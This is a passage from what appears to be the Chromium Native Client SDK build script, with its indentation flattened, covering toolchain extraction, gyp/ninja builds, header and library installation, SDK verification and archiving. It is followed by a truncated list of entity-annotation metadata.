def BuildStepMakePepperDirs(pepperdir, subdirs):
for subdir in subdirs:
buildbot_common.MakeDir(os.path.join(pepperdir, subdir))
TEXT_FILES = [
'AUTHORS',
'COPYING',
'LICENSE',
'README.Makefiles',
'getting_started/README',
]
def BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision,
nacl_revision):
buildbot_common.BuildStep('Add Text Files')
InstallFiles(SDK_SRC_DIR, pepperdir, TEXT_FILES)
# Replace a few placeholders in README
readme_text = open(os.path.join(SDK_SRC_DIR, 'README')).read()
readme_text = readme_text.replace('${VERSION}', pepper_ver)
readme_text = readme_text.replace('${CHROME_REVISION}', chrome_revision)
readme_text = readme_text.replace('${CHROME_COMMIT_POSITION}',
build_version.ChromeCommitPosition())
readme_text = readme_text.replace('${NACL_REVISION}', nacl_revision)
# Year/Month/Day Hour:Minute:Second
time_format = '%Y/%m/%d %H:%M:%S'
readme_text = readme_text.replace('${DATE}',
datetime.datetime.now().strftime(time_format))
open(os.path.join(pepperdir, 'README'), 'w').write(readme_text)
def BuildStepUntarToolchains(pepperdir, toolchains):
buildbot_common.BuildStep('Untar Toolchains')
platform = getos.GetPlatform()
build_platform = '%s_x86' % platform
tmpdir = os.path.join(OUT_DIR, 'tc_temp')
buildbot_common.RemoveDir(tmpdir)
buildbot_common.MakeDir(tmpdir)
  # Create a list of packages to extract, as tuples. The first element is
  # "$PACKAGE_TARGET/$PACKAGE"; the second is the destination directory
  # relative to pepperdir/toolchain.
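  # For example, on linux the x86 glibc entry would be
  # ('linux_x86/nacl_x86_glibc', 'linux_x86_glibc').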
extract_packages = []
for toolchain in toolchains:
toolchain_map = TOOLCHAIN_PACKAGE_MAP.get(toolchain, None)
if toolchain_map:
package_name, tcdir, _ = toolchain_map
package_tuple = (os.path.join(build_platform, package_name),
tcdir % {'platform': platform})
extract_packages.append(package_tuple)
# On linux we also want to extract the arm_trusted package which contains
# the ARM libraries we ship in support of sel_ldr_arm.
if platform == 'linux':
extract_packages.append((os.path.join(build_platform, 'arm_trusted'),
'arm_trusted'))
if extract_packages:
# Extract all of the packages into the temp directory.
package_names = [package_tuple[0] for package_tuple in extract_packages]
buildbot_common.Run([sys.executable, PKGVER,
'--packages', ','.join(package_names),
'--tar-dir', NACL_TOOLCHAINTARS_DIR,
'--dest-dir', tmpdir,
'extract'])
# Move all the packages we extracted to the correct destination.
for package_name, dest_dir in extract_packages:
full_src_dir = os.path.join(tmpdir, package_name)
full_dst_dir = os.path.join(pepperdir, 'toolchain', dest_dir)
buildbot_common.Move(full_src_dir, full_dst_dir)
# Cleanup the temporary directory we are no longer using.
buildbot_common.RemoveDir(tmpdir)
# List of toolchain headers to install.
# Source is relative to top of Chromium tree, destination is relative
# to the toolchain header directory.
NACL_HEADER_MAP = {
'newlib': [
('native_client/src/include/nacl/nacl_exception.h', 'nacl/'),
('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'),
('native_client/src/untrusted/irt/irt.h', ''),
('native_client/src/untrusted/irt/irt_dev.h', ''),
('native_client/src/untrusted/irt/irt_extension.h', ''),
('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'),
('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'),
('native_client/src/untrusted/pthread/pthread.h', ''),
('native_client/src/untrusted/pthread/semaphore.h', ''),
('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'),
('ppapi/nacl_irt/public/irt_ppapi.h', ''),
],
'glibc': [
('native_client/src/include/nacl/nacl_exception.h', 'nacl/'),
('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'),
('native_client/src/untrusted/irt/irt.h', ''),
('native_client/src/untrusted/irt/irt_dev.h', ''),
('native_client/src/untrusted/irt/irt_extension.h', ''),
('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'),
('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'),
('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'),
('ppapi/nacl_irt/public/irt_ppapi.h', ''),
],
}
def InstallFiles(src_root, dest_root, file_list):
"""Copy a set of files from src_root to dest_root according
  to the given mapping. This allows files to be copied to a
  location in the destination tree that is different from their
  location in the source tree.
  If the destination mapping ends with a '/' then the destination
  basename is inherited from the source file.
Wildcards can be used in the source list but it is not recommended
as this can end up adding things to the SDK unintentionally.
"""
for file_spec in file_list:
# The list of files to install can be a simple list of
# strings or a list of pairs, where each pair corresponds
# to a mapping from source to destination names.
if type(file_spec) == str:
src_file = dest_file = file_spec
else:
src_file, dest_file = file_spec
src_file = os.path.join(src_root, src_file)
# Expand sources files using glob.
sources = glob.glob(src_file)
if not sources:
sources = [src_file]
if len(sources) > 1 and not dest_file.endswith('/'):
buildbot_common.ErrorExit("Target file must end in '/' when "
"using globbing to install multiple files")
for source in sources:
if dest_file.endswith('/'):
dest = os.path.join(dest_file, os.path.basename(source))
else:
dest = dest_file
dest = os.path.join(dest_root, dest)
if not os.path.isdir(os.path.dirname(dest)):
buildbot_common.MakeDir(os.path.dirname(dest))
buildbot_common.CopyFile(source, dest)
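# Minimal usage sketch (hypothetical paths): this would copy 'docs/README'
# to '<dest>/README', and every header matched by 'include/*.h' into
# '<dest>/headers/' (a trailing '/' inherits the source basename):
#   InstallFiles('/path/to/src', '/path/to/dest',
#                [('docs/README', 'README'), ('include/*.h', 'headers/')])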
def InstallNaClHeaders(tc_dst_inc, tcname):
"""Copies NaCl headers to expected locations in the toolchain."""
InstallFiles(SRC_DIR, tc_dst_inc, NACL_HEADER_MAP[GetToolchainLibc(tcname)])
def MakeNinjaRelPath(path):
return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path)
# TODO(ncbray): stop building and copying libraries into the SDK that are
# already provided by the toolchain.
# Mapping from libc to the gyp-built libraries that get copied into the SDK
TOOLCHAIN_LIBS = {
'newlib' : [
'libminidump_generator.a',
'libnacl.a',
'libnacl_dyncode.a',
'libnacl_exception.a',
'libnacl_list_mappings.a',
'libnosys.a',
'libppapi.a',
'libppapi_stub.a',
'libpthread.a',
],
'glibc': [
'libminidump_generator.a',
'libminidump_generator.so',
'libnacl.a',
'libnacl_dyncode.a',
'libnacl_dyncode.so',
'libnacl_exception.a',
'libnacl_exception.so',
'libnacl_list_mappings.a',
'libnacl_list_mappings.so',
'libppapi.a',
'libppapi.so',
'libppapi_stub.a',
]
}
def GypNinjaInstall(pepperdir, toolchains):
tools_files_32 = [
['sel_ldr', 'sel_ldr_x86_32'],
['irt_core_newlib_x32.nexe', 'irt_core_x86_32.nexe'],
['irt_core_newlib_x64.nexe', 'irt_core_x86_64.nexe'],
]
arm_files = [
['elf_loader_newlib_arm.nexe', 'elf_loader_arm.nexe'],
]
tools_files_64 = []
platform = getos.GetPlatform()
# TODO(binji): dump_syms doesn't currently build on Windows. See
# http://crbug.com/245456
if platform != 'win':
tools_files_64 += [
['dump_syms', 'dump_syms'],
['minidump_dump', 'minidump_dump'],
['minidump_stackwalk', 'minidump_stackwalk']
]
tools_files_64.append(['sel_ldr', 'sel_ldr_x86_64'])
tools_files_64.append(['ncval_new', 'ncval'])
if platform == 'linux':
tools_files_32.append(['nacl_helper_bootstrap',
'nacl_helper_bootstrap_x86_32'])
tools_files_64.append(['nacl_helper_bootstrap',
'nacl_helper_bootstrap_x86_64'])
tools_files_32.append(['nonsfi_loader_newlib_x32_nonsfi.nexe',
'nonsfi_loader_x86_32'])
tools_dir = os.path.join(pepperdir, 'tools')
buildbot_common.MakeDir(tools_dir)
# Add .exe extensions to all windows tools
for pair in tools_files_32 + tools_files_64:
if platform == 'win' and not pair[0].endswith('.nexe'):
pair[0] += '.exe'
pair[1] += '.exe'
# Add ARM binaries
if platform == 'linux' and not options.no_arm_trusted:
arm_files += [
['irt_core_newlib_arm.nexe', 'irt_core_arm.nexe'],
['nacl_helper_bootstrap', 'nacl_helper_bootstrap_arm'],
['nonsfi_loader_newlib_arm_nonsfi.nexe', 'nonsfi_loader_arm'],
['sel_ldr', 'sel_ldr_arm']
]
InstallFiles(GetNinjaOutDir('x64'), tools_dir, tools_files_64)
InstallFiles(GetNinjaOutDir('ia32'), tools_dir, tools_files_32)
InstallFiles(GetNinjaOutDir('arm'), tools_dir, arm_files)
for tc in toolchains:
if tc in ('host', 'clang-newlib'):
continue
elif tc == 'pnacl':
xarches = (None, 'ia32', 'x64', 'arm')
elif tc in ('x86_glibc', 'x86_newlib'):
xarches = ('ia32', 'x64')
elif tc == 'arm_glibc':
xarches = ('arm',)
else:
raise AssertionError('unexpected toolchain value: %s' % tc)
for xarch in xarches:
src_dir = GetGypBuiltLib(tc, xarch)
dst_dir = GetOutputToolchainLib(pepperdir, tc, xarch)
libc = GetToolchainLibc(tc)
InstallFiles(src_dir, dst_dir, TOOLCHAIN_LIBS[libc])
def GypNinjaBuild_NaCl(rel_out_dir):
gyp_py = os.path.join(NACL_DIR, 'build', 'gyp_nacl')
nacl_core_sdk_gyp = os.path.join(NACL_DIR, 'build', 'nacl_core_sdk.gyp')
all_gyp = os.path.join(NACL_DIR, 'build', 'all.gyp')
out_dir_32 = MakeNinjaRelPath(rel_out_dir + '-ia32')
out_dir_64 = MakeNinjaRelPath(rel_out_dir + '-x64')
out_dir_arm = MakeNinjaRelPath(rel_out_dir + '-arm')
out_dir_clang_32 = MakeNinjaRelPath(rel_out_dir + '-clang-ia32')
out_dir_clang_64 = MakeNinjaRelPath(rel_out_dir + '-clang-x64')
out_dir_clang_arm = MakeNinjaRelPath(rel_out_dir + '-clang-arm')
GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_32,
gyp_defines=['use_nacl_clang=0'])
GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_64,
gyp_defines=['use_nacl_clang=0'])
GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_arm,
gyp_defines=['use_nacl_clang=0'])
GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk',
out_dir_clang_32, gyp_defines=['use_nacl_clang=1'])
GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk',
out_dir_clang_64, gyp_defines=['use_nacl_clang=1'])
GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk',
out_dir_clang_arm, gyp_defines=['use_nacl_clang=1'])
GypNinjaBuild('x64', gyp_py, all_gyp, 'ncval_new', out_dir_64)
def GypNinjaBuild_Breakpad(rel_out_dir):
# TODO(binji): dump_syms doesn't currently build on Windows. See
# http://crbug.com/245456
if getos.GetPlatform() == 'win':
return
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'breakpad', 'breakpad.gyp')
build_list = ['dump_syms', 'minidump_dump', 'minidump_stackwalk']
GypNinjaBuild('x64', gyp_py, gyp_file, build_list, out_dir)
def GypNinjaBuild_PPAPI(arch, rel_out_dir, gyp_defines=None):
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client',
'native_client.gyp')
GypNinjaBuild(arch, gyp_py, gyp_file, 'ppapi_lib', out_dir,
gyp_defines=gyp_defines)
def GypNinjaBuild_Pnacl(rel_out_dir, target_arch):
# TODO(binji): This will build the pnacl_irt_shim twice; once as part of the
# Chromium build, and once here. When we move more of the SDK build process
# to gyp, we can remove this.
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'src',
'untrusted', 'pnacl_irt_shim', 'pnacl_irt_shim.gyp')
targets = ['aot']
GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir)
def GypNinjaBuild(arch, gyp_py_script, gyp_file, targets,
out_dir, gyp_defines=None):
gyp_env = dict(os.environ)
gyp_env['GYP_GENERATORS'] = 'ninja'
gyp_defines = gyp_defines or []
gyp_defines.append('nacl_allow_thin_archives=0')
if not options.no_use_sysroot:
gyp_defines.append('use_sysroot=1')
if options.mac_sdk:
gyp_defines.append('mac_sdk=%s' % options.mac_sdk)
if arch is not None:
gyp_defines.append('target_arch=%s' % arch)
if arch == 'arm':
gyp_env['GYP_CROSSCOMPILE'] = '1'
if options.no_arm_trusted:
gyp_defines.append('disable_cross_trusted=1')
if getos.GetPlatform() == 'mac':
gyp_defines.append('clang=1')
gyp_env['GYP_DEFINES'] = ' '.join(gyp_defines)
# We can't use windows path separators in GYP_GENERATOR_FLAGS since
# gyp uses shlex to parse them and treats '\' as an escape char.
gyp_env['GYP_GENERATOR_FLAGS'] = 'output_dir=%s' % out_dir.replace('\\', '/')
# Print relevant environment variables
for key, value in gyp_env.iteritems():
if key.startswith('GYP') or key in ('CC',):
print ' %s="%s"' % (key, value)
buildbot_common.Run(
[sys.executable, gyp_py_script, gyp_file, '--depth=.'],
cwd=SRC_DIR,
env=gyp_env)
NinjaBuild(targets, out_dir, arch)
def NinjaBuild(targets, out_dir, arch):
if type(targets) is not list:
targets = [targets]
out_config_dir = os.path.join(out_dir, GetConfigDir(arch))
buildbot_common.Run(['ninja', '-C', out_config_dir] + targets, cwd=SRC_DIR)
def BuildStepBuildToolchains(pepperdir, toolchains, build, clean):
buildbot_common.BuildStep('SDK Items')
if clean:
for dirname in glob.glob(os.path.join(OUT_DIR, GYPBUILD_DIR + '*')):
buildbot_common.RemoveDir(dirname)
build = True
if build:
GypNinjaBuild_NaCl(GYPBUILD_DIR)
GypNinjaBuild_Breakpad(GYPBUILD_DIR + '-x64')
if set(toolchains) & set(['x86_glibc', 'x86_newlib']):
GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-ia32',
['use_nacl_clang=0'])
GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-x64',
['use_nacl_clang=0'])
if 'arm_glibc' in toolchains:
GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-arm',
['use_nacl_clang=0'] )
if 'pnacl' in toolchains:
GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-clang-ia32',
['use_nacl_clang=1'])
GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-clang-x64',
['use_nacl_clang=1'])
GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-clang-arm',
['use_nacl_clang=1'])
# NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.
for arch in ('ia32', 'arm'):
# Fill in the latest native pnacl shim library from the chrome build.
build_dir = GYPBUILD_DIR + '-pnacl-' + arch
GypNinjaBuild_Pnacl(build_dir, arch)
GypNinjaInstall(pepperdir, toolchains)
for toolchain in toolchains:
if toolchain not in ('host', 'clang-newlib'):
InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, toolchain),
toolchain)
if 'pnacl' in toolchains:
# NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.
for arch in ('ia32', 'arm'):
# Fill in the latest native pnacl shim library from the chrome build.
build_dir = GYPBUILD_DIR + '-pnacl-' + arch
if arch == 'ia32':
nacl_arches = ['x86-32', 'x86-64']
elif arch == 'arm':
nacl_arches = ['arm']
else:
buildbot_common.ErrorExit('Unknown architecture: %s' % arch)
for nacl_arch in nacl_arches:
release_build_dir = os.path.join(OUT_DIR, build_dir, 'Release',
'gen', 'tc_pnacl_translate',
'lib-' + nacl_arch)
pnacldir = GetToolchainDir(pepperdir, 'pnacl')
pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir, nacl_arch)
if not os.path.isdir(pnacl_translator_lib_dir):
buildbot_common.ErrorExit('Expected %s directory to exist.' %
pnacl_translator_lib_dir)
buildbot_common.CopyFile(
os.path.join(release_build_dir, 'libpnacl_irt_shim.a'),
pnacl_translator_lib_dir)
InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'x86'),
'pnacl')
InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'arm'),
'pnacl')
def MakeDirectoryOrClobber(pepperdir, dirname, clobber):
dirpath = os.path.join(pepperdir, dirname)
if clobber:
buildbot_common.RemoveDir(dirpath)
buildbot_common.MakeDir(dirpath)
return dirpath
def BuildStepUpdateHelpers(pepperdir, clobber):
buildbot_common.BuildStep('Update project helpers')
build_projects.UpdateHelpers(pepperdir, clobber=clobber)
def BuildStepUpdateUserProjects(pepperdir, toolchains,
build_experimental, clobber):
buildbot_common.BuildStep('Update examples and libraries')
filters = {}
if not build_experimental:
filters['EXPERIMENTAL'] = False
dsc_toolchains = []
for t in toolchains:
if t.startswith('x86_') or t.startswith('arm_'):
if t[4:] not in dsc_toolchains:
dsc_toolchains.append(t[4:])
elif t == 'host':
dsc_toolchains.append(getos.GetPlatform())
else:
dsc_toolchains.append(t)
filters['TOOLS'] = dsc_toolchains
# Update examples and libraries
filters['DEST'] = [
'getting_started',
'examples/api',
'examples/demo',
'examples/tutorial',
'src'
]
tree = parse_dsc.LoadProjectTree(SDK_SRC_DIR, include=filters)
build_projects.UpdateProjects(pepperdir, tree, clobber=clobber,
toolchains=dsc_toolchains)
def BuildStepMakeAll(pepperdir, directory, step_name,
deps=True, clean=False, config='Debug', args=None):
buildbot_common.BuildStep(step_name)
build_projects.BuildProjectsBranch(pepperdir, directory, clean,
deps, config, args)
def BuildStepBuildLibraries(pepperdir, directory):
BuildStepMakeAll(pepperdir, directory, 'Build Libraries Debug',
clean=True, config='Debug')
BuildStepMakeAll(pepperdir, directory, 'Build Libraries Release',
clean=True, config='Release')
  # Clean up .pyc files generated while building the libraries. Without
  # this we would end up shipping them in the SDK tarball.
buildbot_common.RemoveFile(os.path.join(pepperdir, 'tools', '*.pyc'))
def GenerateNotice(fileroot, output_filename='NOTICE', extra_files=None):
# Look for LICENSE files
license_filenames_re = re.compile('LICENSE|COPYING|COPYRIGHT')
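  # Note: re.match() anchors at the start of the name, so 'LICENSE.txt'
  # matches but a name like 'MIT-LICENSE' would not.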
license_files = []
for root, _, files in os.walk(fileroot):
for filename in files:
if license_filenames_re.match(filename):
path = os.path.join(root, filename)
license_files.append(path)
if extra_files:
license_files += [os.path.join(fileroot, f) for f in extra_files]
print '\n'.join(license_files)
if not os.path.isabs(output_filename):
output_filename = os.path.join(fileroot, output_filename)
generate_notice.Generate(output_filename, fileroot, license_files)
def BuildStepVerifyFilelist(pepperdir):
buildbot_common.BuildStep('Verify SDK Files')
file_list_path = os.path.join(SCRIPT_DIR, 'sdk_files.list')
try:
print 'SDK directory: %s' % pepperdir
verify_filelist.Verify(file_list_path, pepperdir)
print 'OK'
except verify_filelist.ParseException, e:
buildbot_common.ErrorExit('Parsing sdk_files.list failed:\n\n%s' % e)
except verify_filelist.VerifyException, e:
file_list_rel = os.path.relpath(file_list_path)
verify_filelist_py = os.path.splitext(verify_filelist.__file__)[0] + '.py'
verify_filelist_py = os.path.relpath(verify_filelist_py)
pepperdir_rel = os.path.relpath(pepperdir)
msg = """\
SDK verification failed:
%s
Add/remove files from %s to fix.
Run:
./%s %s %s
to test.""" % (e, file_list_rel, verify_filelist_py, file_list_rel,
pepperdir_rel)
buildbot_common.ErrorExit(msg)
def BuildStepTarBundle(pepper_ver, tarfile):
buildbot_common.BuildStep('Tar Pepper Bundle')
buildbot_common.MakeDir(os.path.dirname(tarfile))
buildbot_common.Run([sys.executable, CYGTAR, '-C', OUT_DIR, '-cjf', tarfile,
'pepper_' + pepper_ver], cwd=NACL_DIR)
def GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, tarfile,
archive_url):
with open(tarfile, 'rb') as tarfile_stream:
archive_sha1, archive_size = manifest_util.DownloadAndComputeHash(
tarfile_stream)
archive = manifest_util.Archive(manifest_util.GetHostOS())
archive.url = archive_url
archive.size = archive_size
archive.checksum = archive_sha1
bundle = manifest_util.Bundle('pepper_' + pepper_ver)
bundle.revision = int(chrome_revision)
bundle.repath = 'pepper_' + pepper_ver
bundle.version = int(pepper_ver)
bundle.description = (
'Chrome %s bundle. Chrome revision: %s. NaCl revision: %s' % (
pepper_ver, chrome_revision, nacl_revision))
bundle.stability = 'dev'
bundle.recommended = 'no'
bundle.archives = [archive]
return bundle
def Archive(filename, from_directory, step_link=True):
if buildbot_common.IsSDKBuilder():
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/'
else:
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk_test/'
bucket_path += build_version.ChromeVersion()
buildbot_common.Archive(filename, bucket_path, from_directory, step_link)
def BuildStepArchiveBundle(name, pepper_ver, chrome_revision, nacl_revision,
tarfile):
buildbot_common.BuildStep('Archive %s' % name)
tarname = os.path.basename(tarfile)
tarfile_dir = os.path.dirname(tarfile)
Archive(tarname, tarfile_dir)
# generate "manifest snippet" for this archive.
archive_url = GSTORE + 'nacl_sdk/%s/%s' % (
build_version.ChromeVersion(), tarname)
bundle = GetManifestBundle(pepper_ver, chrome_revision, nacl_revision,
tarfile, archive_url)
manifest_snippet_file = os.path.join(OUT_DIR, tarname + '.json')
with open(manifest_snippet_file, 'wb') as manifest_snippet_stream:
manifest_snippet_stream.write(bundle.GetDataAsString())
Archive(tarname + '.json', OUT_DIR, step_link=False)
def BuildStepBuildPNaClComponent(version, revision):
  # Sadly revision can go backwards for a given version, since when a version
  # is built from master, revision will be a huge number (in the hundreds of
  # thousands). Once the branch happens, the revision will reset to zero.
# TODO(sbc): figure out how to compensate for this in some way such that
# revisions always go forward for a given version.
buildbot_common.BuildStep('PNaCl Component')
# Version numbers must follow the format specified in:
# https://developer.chrome.com/extensions/manifest/version
# So ensure that rev_major/rev_minor don't overflow and ensure there
# are no leading zeros.
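  # Worked example (hypothetical numbers): version=49, revision='123456'
  # yields rev_major=12, rev_minor=3456, i.e. the component version string
  # '0.49.12.3456'.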
if len(revision) > 4:
rev_minor = int(revision[-4:])
rev_major = int(revision[:-4])
version = "0.%s.%s.%s" % (version, rev_major, rev_minor)
else:
version = "0.%s.0.%s" % (version, revision)
buildbot_common.Run(['./make_pnacl_component.sh',
'pnacl_multicrx_%s.zip' % revision,
version], cwd=SCRIPT_DIR)
def BuildStepArchivePNaClComponent(revision):
buildbot_common.BuildStep('Archive PNaCl Component')
Archive('pnacl_multicrx_%s.zip' % revision, OUT_DIR)
def BuildStepArchiveSDKTools():
buildbot_common.BuildStep('Build SDK Tools')
build_updater.BuildUpdater(OUT_DIR)
buildbot_common.BuildStep('Archive SDK Tools')
Archive('sdk_tools.tgz', OUT_DIR, step_link=False)
Archive('nacl_sdk.zip', OUT_DIR, step_link=False)
def BuildStepBuildAppEngine(pepperdir, chrome_revision):
"""Build the projects found in src/gonacl_appengine/src"""
buildbot_common.BuildStep('Build GoNaCl AppEngine Projects')
cmd = ['make', 'upload', 'REVISION=%s' % chrome_revision]
env = dict(os.environ)
env['NACL_SDK_ROOT'] = pepperdir
env['NACLPORTS_NO_ANNOTATE'] = "1"
buildbot_common.Run(cmd, env=env, cwd=GONACL_APPENGINE_SRC_DIR)
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--qemu', help='Add qemu for ARM.',
action='store_true')
parser.add_argument('--tar', help='Force the tar step.',
action='store_true')
parser.add_argument('--archive', help='Force the archive step.',
action='store_true')
parser.add_argument('--release', help='PPAPI release version.',
dest='release', default=None)
parser.add_argument('--build-app-engine',
help='Build AppEngine demos.', action='store_true')
parser.add_argument('--experimental',
help='build experimental examples and libraries', action='store_true',
dest='build_experimental')
parser.add_argument('--skip-toolchain', help='Skip toolchain untar',
action='store_true')
parser.add_argument('--no-clean', dest='clean', action='store_false',
help="Don't clean gypbuild directories")
parser.add_argument('--mac-sdk',
help='Set the mac-sdk (e.g. 10.6) to use when building with ninja.')
parser.add_argument('--no-arm-trusted', action='store_true',
help='Disable building of ARM trusted components (sel_ldr, etc).')
parser.add_argument('--no-use-sysroot', action='store_true',
help='Disable building against sysroot.')
# To setup bash completion for this command first install optcomplete
# and then add this line to your .bashrc:
# complete -F _optcomplete build_sdk.py
try:
import optcomplete
optcomplete.autocomplete(parser)
except ImportError:
pass
global options
options = parser.parse_args(args)
buildbot_common.BuildStep('build_sdk')
if buildbot_common.IsSDKBuilder():
options.archive = True
# TODO(binji): re-enable app_engine build when the linux builder stops
# breaking when trying to git clone from github.
# See http://crbug.com/412969.
options.build_app_engine = False
options.tar = True
# NOTE: order matters here. This will be the order that is specified in the
# Makefiles; the first toolchain will be the default.
toolchains = ['pnacl', 'x86_glibc', 'arm_glibc', 'clang-newlib', 'host']
print 'Building: ' + ' '.join(toolchains)
platform = getos.GetPlatform()
if options.archive and not options.tar:
parser.error('Incompatible arguments with archive.')
chrome_version = int(build_version.ChromeMajorVersion())
chrome_revision = build_version.ChromeRevision()
nacl_revision = build_version.NaClRevision()
pepper_ver = str(chrome_version)
pepper_old = str(chrome_version - 1)
pepperdir = os.path.join(OUT_DIR, 'pepper_' + pepper_ver)
pepperdir_old = os.path.join(OUT_DIR, 'pepper_' + pepper_old)
tarname = 'naclsdk_%s.tar.bz2' % platform
tarfile = os.path.join(OUT_DIR, tarname)
if options.release:
pepper_ver = options.release
print 'Building PEPPER %s at %s' % (pepper_ver, chrome_revision)
if 'NACL_SDK_ROOT' in os.environ:
# We don't want the currently configured NACL_SDK_ROOT to have any effect
# of the build.
del os.environ['NACL_SDK_ROOT']
if platform == 'linux':
# Linux-only: make sure the debian/stable sysroot image is installed
install_script = os.path.join(SRC_DIR, 'build', 'linux', 'sysroot_scripts',
'install-sysroot.py')
buildbot_common.Run([sys.executable, install_script, '--arch=arm'])
buildbot_common.Run([sys.executable, install_script, '--arch=i386'])
buildbot_common.Run([sys.executable, install_script, '--arch=amd64'])
if not options.skip_toolchain:
BuildStepCleanPepperDirs(pepperdir, pepperdir_old)
BuildStepMakePepperDirs(pepperdir, ['include', 'toolchain', 'tools'])
BuildStepDownloadToolchains(toolchains)
BuildStepUntarToolchains(pepperdir, toolchains)
if platform == 'linux':
buildbot_common.Move(os.path.join(pepperdir, 'toolchain', 'arm_trusted'),
os.path.join(OUT_DIR, 'arm_trusted'))
if platform == 'linux':
# Linux-only: Copy arm libraries from the arm_trusted package. These are
# needed to be able to run sel_ldr_arm under qemu.
arm_libs = [
'lib/arm-linux-gnueabihf/librt.so.1',
'lib/arm-linux-gnueabihf/libpthread.so.0',
'lib/arm-linux-gnueabihf/libgcc_s.so.1',
'lib/arm-linux-gnueabihf/libc.so.6',
'lib/arm-linux-gnueabihf/ld-linux-armhf.so.3',
'lib/arm-linux-gnueabihf/libm.so.6',
'usr/lib/arm-linux-gnueabihf/libstdc++.so.6'
]
arm_lib_dir = os.path.join(pepperdir, 'tools', 'lib', 'arm_trusted', 'lib')
buildbot_common.MakeDir(arm_lib_dir)
for arm_lib in arm_libs:
arm_lib = os.path.join(OUT_DIR, 'arm_trusted', arm_lib)
buildbot_common.CopyFile(arm_lib, arm_lib_dir)
buildbot_common.CopyFile(os.path.join(OUT_DIR, 'arm_trusted', 'qemu-arm'),
os.path.join(pepperdir, 'tools'))
BuildStepBuildToolchains(pepperdir, toolchains,
not options.skip_toolchain,
options.clean)
BuildStepUpdateHelpers(pepperdir, True)
BuildStepUpdateUserProjects(pepperdir, toolchains,
options.build_experimental, True)
BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, nacl_revision)
# Ship with libraries prebuilt, so run that first.
BuildStepBuildLibraries(pepperdir, 'src')
GenerateNotice(pepperdir)
# Verify the SDK contains what we expect.
BuildStepVerifyFilelist(pepperdir)
if options.tar:
BuildStepTarBundle(pepper_ver, tarfile)
if platform == 'linux':
BuildStepBuildPNaClComponent(pepper_ver, chrome_revision)
if options.build_app_engine and platform == 'linux':
BuildStepBuildAppEngine(pepperdir, chrome_revision)
if options.qemu:
qemudir = os.path.join(NACL_DIR, 'toolchain', 'linux_arm-trusted')
oshelpers.Copy(['-r', qemudir, pepperdir])
# Archive the results on Google Cloud Storage.
if options.archive:
BuildStepArchiveBundle('build', pepper_ver, chrome_revision, nacl_revision,
tarfile)
# Only archive sdk_tools/naclport/pnacl_component on linux.
if platform == 'linux':
BuildStepArchiveSDKTools()
BuildStepArchivePNaClComponent(chrome_revision)
return 0
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except KeyboardInterrupt:
buildbot_common.ErrorExit('build_sdk: interrupted')
| 36,336 | [['URL', "https://chromium.googlesource.com/external/naclports.git'"], ['DATE_TIME', '2012'], ['NRP', 'NACL_DIR'], ['PERSON', 'sys.path.append(os.path.join(NACL_DIR'], ['PERSON', 'https://chromium.googlesource.com/external/naclports.git'], ['PERSON', 'gypbuild'], ['DATE_TIME', "'32"], ['DATE_TIME', "'64'"], ['LOCATION', 'tcname'], ['PERSON', 'arch'], ['LOCATION', 'BuildStepCleanPepperDirs(pepperdir'], ['LOCATION', 'pepperdir'], ['PERSON', 'TEXT_FILES'], ['DATE_TIME', 'Year/Month/Day Hour:Minute:Second'], ['LOCATION', 'tmpdir'], ['PERSON', 'full_src_dir'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'NACL_HEADER_MAP[GetToolchainLibc(tcname'], ['PERSON', 'libppapi.a'], ['PERSON', 'libppapi.a'], ['PERSON', 'tools_dir = os.path.join(pepperdir'], ['PERSON', 'nonsfi_loader_arm'], ['PERSON', 'sel_ldr_arm'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['LOCATION', 'tools_dir'], ['PERSON', 'elif tc'], ['LOCATION', 'tc'], ['PERSON', 'xarch'], ['PERSON', 'nacl_core_sdk_gyp'], ['LOCATION', 